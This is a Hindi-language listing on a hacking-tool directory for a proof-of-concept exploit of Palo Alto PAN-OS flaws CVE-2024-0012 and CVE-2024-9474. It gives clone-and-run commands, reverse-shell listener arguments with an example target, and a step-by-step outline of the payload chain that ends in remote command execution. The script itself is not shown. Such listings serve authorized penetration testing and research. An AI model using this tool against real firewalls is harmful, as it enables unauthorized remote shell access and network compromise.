Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-0012_CVE-2024-9474_PoC — यह PoC Palo Alto PAN-OS में कमजोरियों को लक्षित कर रहा है, विशेष रूप से CVE-2024-0012 और CVE-2024-9474। यह स्क्रिप्ट शोषण प्रक्रिया को स्वचालित करती है, जिसमें पेलोड निर्माण, खंडित वितरण, और निर्बाध कमांड निष्पादन शामिल है। | Kitploit
उपकरण/GitHubGitHub/talatumlabs/cve-2024-0012_cve-2024-9474_poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubtalatumlabs/cve-2024-0012_cve-2024-9474_poc

CVE-2024-0012_CVE-2024-9474_PoC

यह PoC Palo Alto PAN-OS में कमजोरियों को लक्षित कर रहा है, विशेष रूप से CVE-2024-0012 और CVE-2024-9474। यह स्क्रिप्ट शोषण प्रक्रिया को स्वचालित करती है, जिसमें पेलोड निर्माण, खंडित वितरण, और निर्बाध कमांड निष्पादन शामिल है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
851 साल पहलेअभी तक समीक्षित नहीं

🚀 CVE-2024-0012 और CVE-2024-9474 (Palo Alto PAN-OS) एक्सप्लॉइट 🔐

Palo Alto PAN-OS Exploit Type

🛡️ विवरण

यह Proof-of-Concept (PoC) स्क्रिप्ट Palo Alto PAN-OS में कमजोरियों को लक्षित करती है, विशेष रूप से CVE-2024-0012 और CVE-2024-9474, शोषण प्रक्रिया को स्वचालित करके, जिसमें प्रमाणीकरण बाईपास, पेलोड निर्माण, खंडित वितरण, और निर्बाध कमांड निष्पादन शामिल है।

⚠️ यह स्क्रिप्ट केवल शैक्षिक और अधिकृत पेनिट्रेशन टेस्टिंग उद्देश्यों के लिए है। अनधिकृत उपयोग अवैध है।


🔍 संबोधित कमजोरियाँ

CVE-2024-0012

  • प्रकार: प्रमाणीकरण बाईपास
  • प्रभाव: प्रशासनिक इंटरफेस तक अनधिकृत पहुंच सक्षम करता है।
  • गंभीरता: 🚨 गंभीर

CVE-2024-9474

  • प्रकार: कमांड निष्पादन और विशेषाधिकार वृद्धि
  • प्रभाव: दूरस्थ हमलावरों को मनमाने कमांड निष्पादित करने की अनुमति देता है।
  • गंभीरता: 🔥 मध्यम

🧑‍💻 उपयोग

🛠️ रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC

🚀 स्क्रिप्ट चलाएँ

root@kitploit:~
python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>

तर्क:

  • <TARGET_URL>: लक्ष्य URL, जिसमें http या https शामिल है।
  • <LISTENER_IP>: रिवर्स शेल लिसनर के लिए आपका IP पता।
  • <LISTENER_PORT>: रिवर्स शेल लिसनर के लिए पोर्ट।

💡 उदाहरण

root@kitploit:~
python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444

💻 एक्सप्लॉइट डेमो

https://github.com/user-attachments/assets/12ca7632-e5d2-488f-b644-6e278651a2f5


⚙️ यह कैसे काम करता है

इस PoC का पूरा विवरण और तकनीकी अंतर्दृष्टि इस Medium लेख से प्राप्त करें!

  1. 🔍 कमजोरियाँ जाँचता है: सुनिश्चित करता है कि लक्ष्य CVE-2024-0012 और CVE-2024-9474 के प्रति संवेदनशील है।
  2. 🛡️ PHPSESSID निकालता है: आगे के शोषण के लिए एक सत्र ID प्राप्त करता है।
  3. ✨ पेलोड उत्पन्न करता है: एक डबल-एन्कोडेड रिवर्स शेल पेलोड बनाता है।
  4. 📦 खंड अपलोड करता है: लक्ष्य सर्वर पर पेलोड खंड भेजता है।
  5. 🔗 पेलोड को जोड़ता है: लक्ष्य सिस्टम पर पेलोड का पुनर्निर्माण करता है।
  6. ⚡ कमांड निष्पादित करता है: रिवर्स शेल को डीकोड और निष्पादित करता है।

⚠️ कानूनी अस्वीकरण

यह PoC केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। इस उपकरण का अनधिकृत उपयोग सख्त वर्जित है। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।


🧑‍🎓 लेखक

ghostxploiter

टूल डाउनलोड करें